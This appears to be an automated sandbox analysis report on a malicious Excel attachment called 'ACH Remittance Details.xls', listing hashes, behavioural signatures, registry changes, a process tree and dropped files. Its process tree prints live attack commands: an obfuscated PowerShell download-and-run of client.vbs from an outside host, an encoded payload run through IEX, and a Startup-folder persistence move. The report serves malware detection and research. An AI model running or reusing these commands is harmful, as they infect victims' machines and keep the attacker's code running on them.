Analysis
- max time kernel: 146s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-08-2022 08:57
Behavioral task: behavioral1
- Sample: ACH Remittance Details.xls
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: ACH Remittance Details.xls
- Resource: win10v2004-20220812-en
General
- Target: ACH Remittance Details.xls
- Size: 29KB
- MD5: 135a1b45054fd8c36e854fb696d7391a
- SHA1: 80e56aad8cf5281d4374ae3b3f99ae7bd3f46198
- SHA256: 7e59886a1137a4e857507cc61b150d5637ff71b09af43deeb70d1c9644ce465e
- SHA512: 445bec2c31074256f9da3afda2034f150cf8fe3fa6e1441a70a7d4a0068c56c046df8f1269fe4d5d6e7f500699be61521a1c011b4d2ad48a2eb64c9e8958a498
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: pid 420 powershell.exe, target pid 4380 EXCEL.EXE
Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe, powershell.exe
- flow 25: pid 420 powershell.exe
- flow 46: pid 3512 powershell.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (WScript.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: EXCEL.EXE
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)
Modifies Internet Explorer settings
Processes: iexplore.exe, IEXPLORE.EXE
- Set value (int): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{7124B5FD-22D2-11ED-89AC-4AA92575F981} = "0" (iexplore.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" (iexplore.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery (iexplore.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" (IEXPLORE.EXE)
- Set value (int): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" (iexplore.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" (iexplore.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main (IEXPLORE.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\MINIE (iexplore.exe)
- Set value (data): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0a0304bdfb6d801 (iexplore.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" (iexplore.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch (iexplore.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" (iexplore.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" (IEXPLORE.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing (iexplore.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" (iexplore.exe)
- Set value (data): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a100000000002000000000010660000000100002000000011998a8b9283631660250c46eb3c26fa27b641e9d65d31b5193b391cceb1b769000000000e8000000002000020000000dfa46012540e828485e3c43918405f0297e3ab60cfdc820f569fd1604982d3fc20000000f1549905d2c7db8ad86df520d58ec42055d5e1c83fe9c64ae0896cb9edc48fb340000000718761d5af3400ee5b3c5fafd395f7ae252c3ad06714d36361d0c52a1a96c8ea982253e8c322a6fe6e581d4b180a74d54bcab562c68b53e75106eaa60093bef5 (iexplore.exe)
- Set value (data): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9055544bdfb6d801 (iexplore.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive (iexplore.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync (IEXPLORE.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch (IEXPLORE.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage (iexplore.exe)
- Set value (data): \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a1000000000020000000000106600000001000020000000996d05712578e16207f596dc8ae080e7ace39965eab063499d80b2d9a0dd6827000000000e8000000002000020000000241182108b532b9a44edb68a7d9eb32a4805d6c9a46b8637c45ea1b5b7365495200000001b06586b91053880ed2cd4abe81e56b0354bffc55508d19c85d5e3499e04cd6740000000de3f82bfadafa81a72fe520b743c2316a4ee418ec1447828da758daec64b841232a225491bcf7acb1bfacd2aa8715605940e0deded734ff2a11fcfab8e785c0c (iexplore.exe)
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main (iexplore.exe)
Modifies registry class (1 IoC)
Processes: powershell.exe
- Key created: \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings (powershell.exe)
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes: EXCEL.EXE
- pid 4380 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe
- pid 420 powershell.exe
- pid 420 powershell.exe
- pid 2356 powershell.exe
- pid 3512 powershell.exe
- pid 3512 powershell.exe
- pid 2356 powershell.exe
- pid 2356 powershell.exe
- pid 3512 powershell.exe
Suspicious use of AdjustPrivilegeToken (45 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe
- Token: SeDebugPrivilege, pid 420 powershell.exe
- Token: SeDebugPrivilege, pid 2356 powershell.exe
- Token: SeDebugPrivilege, pid 3512 powershell.exe
- The following sequence of 21 tokens is recorded twice for pid 3512 powershell.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of FindShellTrayWindow (1 IoC)
Processes: iexplore.exe
- pid 2180 iexplore.exe
Suspicious use of SetWindowsHookEx (16 IoCs)
Processes: EXCEL.EXE, iexplore.exe, IEXPLORE.EXE
- pid 4380 EXCEL.EXE (recorded 12 times)
- pid 2180 iexplore.exe (recorded 2 times)
- pid 2864 IEXPLORE.EXE (recorded 2 times)
Suspicious use of WriteProcessMemory (11 IoCs)
Processes: EXCEL.EXE, powershell.exe, iexplore.exe, WScript.exe
- PID 4380 EXCEL.EXE wrote to memory of 420 powershell.exe (recorded 2 times)
- PID 420 powershell.exe wrote to memory of 3984 WScript.exe (recorded 2 times)
- PID 2180 iexplore.exe wrote to memory of 2864 IEXPLORE.EXE (recorded 3 times)
- PID 3984 WScript.exe wrote to memory of 3512 powershell.exe (recorded 2 times)
- PID 3984 WScript.exe wrote to memory of 2356 powershell.exe (recorded 2 times)
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 4380, depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH Remittance Details.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 420, depth 2, child of PID 4380)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.tneilc\''+pmet:vne$,''sbv.tneilC/clac/nomwen/moc.ehgityennikcm//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\client.vbs')
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WScript.exe (PID 3984, depth 3, child of PID 420)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\client.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4, child of PID 3984)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=( [binary-encoded byte list spanning several thousand characters, removed from this listing] ) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3512
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2356, depth 4, child of PID 3984)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\client.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.vbs'
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Program Files (x86)\Internet Explorer\ielowutil.exe (PID 3524, depth 1)
Command line: "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe (PID 2180, depth 1)
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
  C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 2864, depth 2, child of PID 2180)
  Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2180 CREDAT:17410 /prefetch:2
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 71444def27770d9071039d005d0323b7
  SHA1: cef8654e95495786ac9347494f4417819373427e
  SHA256: 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
  SHA512: a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 454f9e7fa8aad19d6bac74d19b3086b2
  SHA1: fd31e6cf15a019921faf239343ace0da3cfb06c2
  SHA256: 0f3226ebe6776806997c74f28e76ad5eb235909b8645d43d3564d823fc7834f2
  SHA512: 763af517762363994c0da1bbeef555ce4d8e7928b8dc9ece3aa90a24a232490f990c1948687957c55df2b010cc95c08267e4c5df48645739c70416c60a54840e
- C:\Users\Admin\AppData\Local\Temp\client.vbs
  Filesize: 2KB
  MD5: 5a060aa2e0e82ee0b03b65ce9ed52c2f
  SHA1: c8ef799fb03c6ae42b6f7590d7733c80f54c7c5a
  SHA256: a224dcb4bd0ac20f6241885b3cd0ca5f552dc6ddcca360d27204bd9c47cec4a7
  SHA512: dcf9218da529ae6eeacea9e53ad94f2d3649d27561a721ac9a23abaa49dac0ed11f5b6cd203750247d93e577ce772e3e6afc9bd992348f260875e8903bbcb5f6
- memory/420-140-0x0000018E7E2C0000-0x0000018E7E2E2000-memory.dmp (Filesize: 136KB)
- memory/420-144-0x00007FFE767A0000-0x00007FFE77261000-memory.dmp (Filesize: 10.8MB)
- memory/420-141-0x00007FFE767A0000-0x00007FFE77261000-memory.dmp (Filesize: 10.8MB)
- memory/420-139-0x0000000000000000-mapping.dmp
- memory/2356-150-0x00007FFE759A0000-0x00007FFE76461000-memory.dmp (Filesize: 10.8MB)
- memory/2356-146-0x0000000000000000-mapping.dmp
- memory/2356-152-0x00007FFE759A0000-0x00007FFE76461000-memory.dmp (Filesize: 10.8MB)
- memory/3512-149-0x00007FFE759A0000-0x00007FFE76461000-memory.dmp (Filesize: 10.8MB)
- memory/3512-151-0x00007FFE759A0000-0x00007FFE76461000-memory.dmp (Filesize: 10.8MB)
- memory/3512-145-0x0000000000000000-mapping.dmp
- memory/3512-154-0x00007FFE759A0000-0x00007FFE76461000-memory.dmp (Filesize: 10.8MB)
- memory/3984-142-0x0000000000000000-mapping.dmp
- memory/4380-132-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-138-0x00007FFE5D230000-0x00007FFE5D240000-memory.dmp (Filesize: 64KB)
- memory/4380-136-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-134-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-135-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-133-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-137-0x00007FFE5D230000-0x00007FFE5D240000-memory.dmp (Filesize: 64KB)
- memory/4380-156-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-157-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-158-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)
- memory/4380-159-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmp (Filesize: 64KB)